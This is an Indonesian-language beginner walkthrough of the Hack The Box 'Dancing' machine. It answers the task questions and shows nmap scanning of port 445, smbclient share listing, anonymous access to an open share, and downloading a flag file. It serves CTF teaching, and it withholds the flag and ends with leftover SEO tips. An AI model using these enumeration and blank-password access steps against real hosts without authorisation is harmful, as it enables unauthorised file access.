
Ingin menyelesaikan HTB Dancing Write-up dengan mudah? Panduan ini membahas langkah demi langkah dalam HTB Dancing walkthrough, salah satu HTB Very Easy machines di Hack The Box. Kita akan fokus pada teknik SMB enumeration tutorial menggunakan smbclient dan nmap.
Panduan lengkap menyelesaikan HTB Dancing dengan enumerasi SMB menggunakan Nmap dan smbclient. Cocok untuk pemula CTF dan cybersecurity enthusiast.
Task 1: Apa itu SMB?
Pertanyaan: What does the 3-letter acronym SMB stand for?
Jawaban: Server Message Block
SMB adalah protokol jaringan yang digunakan untuk berbagi file, printer, dan layanan lainnya di jaringan Windows.
Task 2: Port Default SMB
Pertanyaan: What port does SMB use to operate at?
Jawaban: 445
Task 3: Nama Service di Port 445
Pertanyaan: What is the service name for port 445 that came up in our Nmap scan?
Jawaban: microsoft-ds
Task 4: Melihat Share SMB dengan smbclient
Pertanyaan: What is the 'flag' or 'switch' that we can use with the smbclient utility to 'list' the available shares on Dancing?
Jawaban: -L
nmap -p 445 -sV 10.129.161.170
smbclient -L //10.129.161.170
Task 5: Jumlah Share yang Tersedia
Pertanyaan: How many shares are there on Dancing?
Jawaban: 4
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
Task 6: Share yang Dapat Diakses Tanpa Password
Pertanyaan: What is the name of the share we are able to access in the end with a blank password?
Jawaban: WorkShares
smbclient //10.129.161.170/WorkShares -U ""
Task 7: Perintah untuk Mengunduh File
Pertanyaan: What is the command we can use within the SMB shell to download the files we find?
Jawaban: get
smb: \> get flag.txt
Task 8: Submit Flag
Setelah mengakses WorkShares, navigasikan ke folder James.P:
smb: \> cd James.P
smb: \James.P\> ls
smb: \James.P\> get flag.txt
Setelah mengunduh, buka file secara lokal:
cat flag.txt
⚠️ Catatan: Flag tidak ditampilkan di artikel ini untuk mematuhi aturan Hack The Box.
Bagi kamu yang mencari Hack The Box write-up for beginners atau ingin tahu how to solve HTB Dancing, ini adalah titik awal terbaik. Dengan memahami Hack The Box SMB port 445 dan menggunakan smbclient, kamu akan terbiasa menghadapi CTF SMB challenge serupa.
Kesimpulan
HTB Dancing merupakan mesin pemula yang mengajarkan dasar HackTheBox SMB enumeration. Mesin ini juga menjadi contoh smbclient HTB example untuk mengakses SMB shares, terutama pada HTB Dancing SMB share access.
Tips SEO:
- Gunakan internal link ke write-up HTB lain jika tersedia.
- Tambahkan tag:
hackthebox,smb enumeration,ctf writeup,cybersecurity,beginner. - Pastikan judul artikel dan URL mengandung keyword: htb dancing write-up
